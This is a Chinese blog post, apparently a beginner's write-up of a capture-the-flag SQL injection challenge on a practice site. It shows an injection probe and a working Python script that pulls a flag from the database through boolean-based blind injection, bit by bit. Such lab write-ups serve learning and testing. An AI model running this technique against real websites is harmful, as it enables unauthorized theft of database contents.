Python 官方文档:入门教程 => 点击学习
进去输入1观察发现: 2,3都只有一个结果Hello!,我们输入4观察一下 发现空白,于是输入sql注入语句:1' and '1'='1 没有报错,也有显示Hello!于是判断出,该题目没有过滤,只能用基于
进去输入1观察发现:
2,3都只有一个结果Hello!,我们输入4观察一下
发现空白,于是输入sql注入语句:1' and '1'='1
没有报错,也有显示Hello!于是判断出,该题目没有过滤,只能用基于Hello!回显的sql注入
猜测数据库,数据表,字段这些我就不浪费时间写了,有想要了解的道友,可以自行百度,或留言交流,我这里直接写爆破flag表flag字段的代码就好了
代码如下:
#!/usr/bin/python
#coding=utf-8
#Author = One
import requests
def main():
n = 0
binary = ""
flag = ""
for i in range(1,1000):
for j in range(8):
url = "Http://ctf5.shiyanbar.com/WEB/index_3.PHP?id=1' and 1=if((ascii(substring((select flag from flag),"+str(i)+",1))%26"+str(2**j)+")="+str(2**j)+",1,0) %23"
request = requests.get(url)
if(request.text.find('Hello!') != -1):
binary = '1'+binary
n = 0
else:
binary = '0'+binary
n += 1
print chr(int(binary,2)),
flag += chr(int(binary,2))
binary = ""
if(n >= 8):
print "\n"+flag
break
if __name__ == '__main__':
main()
#上述代码使用的是按位与方法,比普通循环遍历所有可能字符要快,比较8次必得一个字符结果
即可爆破出结果:
本人也是初学者,参考了许多大佬的wp 自己写出来后有什么错误的地方,希望大家指出,谢谢!
--结束END--
本文标题: 6.简单sql注入之3
本文链接: https://www.lsjlt.com/news/187644.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
下载Word文档到电脑,方便收藏和打印~
2024-03-01
2024-03-01
2024-03-01
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0